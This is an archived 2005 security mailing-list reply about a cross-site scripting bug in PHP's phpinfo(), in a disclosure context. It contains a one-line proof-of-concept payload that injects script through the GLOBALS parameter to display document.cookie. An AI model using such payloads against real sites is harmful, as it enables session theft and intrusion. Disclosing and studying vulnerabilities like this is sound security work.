Re: [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting(XSS)XVulnerability in phpinfo()

phole_at_hushmail.com
Date: 11/03/05

Next message: tHe cReW: "[Full-disclosure] H4-CREW-000003 Advirosy: Superclick XSS via popup.php"

Previous message: ad_at_class101.org: "RE: [Full-disclosure] Re: new IE bug (confirmed on ALL windows)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Thu,  3 Nov 2005 07:06:10 -0800
To: <bugtraq@securityfocus.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

great Work

PoC:
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>

this Don't Work:
phpinfo.php?test=<script>alert(document.cookie);</script>
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkNqJ2EACgkQ3APBCuix8ZmWRACgs0IvvixY6zfmkpJ/9APUtgPLFfgA
oJgOYQ4jbwGaTcJV95ZVyiAQwMXF
=zYsZ
-----END PGP SIGNATURE-----

Concerned about your privacy? Instantly send FREE secure email, no account
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--------------------------------------------------------

The information contained in this message is intended only for the
recipient, and may be a confidential attorney-client communication or may
otherwise be privileged and confidential and protected from disclosure. If
the reader of this message is not the intended recipient, or an employee
or agent responsible for delivering this message to the intended
recipient, please be aware that any dissemination or copying of this
communication is strictly prohibited. If you have received this
communication in error, please immediately notify us by replying to the
message and deleting it from your computer.

--------------------------------------------------------

Next message: tHe cReW: "[Full-disclosure] H4-CREW-000003 Advirosy: Superclick XSS via popup.php"

Previous message: ad_at_class101.org: "RE: [Full-disclosure] Re: new IE bug (confirmed on ALL windows)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting(XSS)XVulnerability in phpinfo()
... Full-Disclosure - We believe in it. ... recipient, and may be a confidential attorney-client communication or may ...
(Bugtraq)
[HPADM] Summary Hparray problem
... The information contained in this communication is ... is intended only for the use of the recipient ... distribution, or copying of this communication is strictly ...
(HP-UX-Admin)
[HPADM] RE: Security Tracking
... I have been given a task, on monitoring one of out credit customers ... The information contained in this communication is ... is intended only for the use of the recipient ... delete the original message or any copy of it from your ...
(HP-UX-Admin)
[HPADM] SUMMARY script question for matching file on the basis foeld
... matching employee no. ... and may be a confidential attorney-client ... intended recipient, or an employee or agent responsible for delivering ... dissemination or copying of this communication is strictly prohibited. ...
(HP-UX-Admin)